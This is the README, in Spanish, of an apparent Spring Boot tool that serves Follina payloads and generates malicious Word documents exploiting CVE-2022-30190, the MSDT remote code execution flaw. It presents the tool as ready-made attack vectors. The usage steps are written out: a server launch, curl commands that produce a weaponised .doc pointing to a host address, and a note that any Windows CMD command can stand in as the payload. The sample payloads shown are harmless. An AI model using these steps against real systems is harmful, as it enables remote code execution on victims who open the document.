
Servidor para alojar/activar payloads de Follina y generador de documentos maliciosos de Word que explotan el protocolo MS-MSDT. (CVE-2022-30190)
Este repositorio contiene una aplicación Spring Boot simple que actúa tanto como servidor para alojar/activar payloads de Follina, como generador de documentos de Word maliciosos listos para ser usados como vectores de ataque para explotar CVE-2022-30190.
Esta vulnerabilidad consiste en Ejecución Remota de Código a través de MSDT (Herramienta de Diagnóstico de Soporte de Microsoft Windows).
Para servir un payload único de tu elección, debes:
export FOLLINA_PAYLOAD="notepad.exe"
mvn spring-boot:run
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc
Si deseas cambiar el payload actual, primero debes detener el servidor activo, y repetir los pasos después de definir el nuevo payload.
NOTA: el payload puede ser reemplazado por cualquier otro comando, siempre que pueda ejecutarse a través del CMD de Windows.
Para servir un payload del lado del cliente de tu elección, debes:
mvn spring-boot:run
cmd, p.ej.:curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc
El payload en este caso está incrustado en el documento, y simplemente necesitará activación contactando al servidor. De esta manera, puedes tener múltiples payloads diferentes distribuidos en varios documentos y no tendrás que reiniciar el servidor para cambiar de payload, ya que puedes simplemente generar un nuevo documento con el payload deseado incrustado.
Muchas gracias a John Hammond por crear la implementación en Python y compartir su análisis del CVE.